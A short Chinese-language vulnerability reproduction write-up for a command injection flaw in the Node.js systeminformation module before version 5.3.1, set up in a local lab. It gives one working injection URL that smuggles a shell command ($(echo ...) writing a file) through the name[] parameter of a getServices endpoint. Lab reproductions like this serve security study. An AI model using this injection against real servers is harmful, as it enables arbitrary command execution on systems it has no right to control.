漏洞描述
Node.js是一个基于Chrome V8引擎的JavaScript运行环境,用于方便的搭建响应速度快、易于拓展的网络应用。
Node.js-systeminformation是用于获取各种系统信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数中注入payload执行系统命令。
影响版本
Systeminformation < 5.3.1
漏洞环境
我这里是采用的本地搭建的环境,为使效果更明显
首先,从github中下载对应版本的Node.js源码,并进行打开(我是使用的Linux系统)
首先查看一下index.js文件 查找对应端口
cat index.js
运行网站
node index.js
漏洞复现过程
漏洞触发页面条件(地址):
在URL中输入
http://127.0.0.1:8000/api/getServices?name[]=$(echo -e 'xiaodi' > test.txt)
echo -e 'xiaodi' > test.txt 代表你输入的命令
复现完成。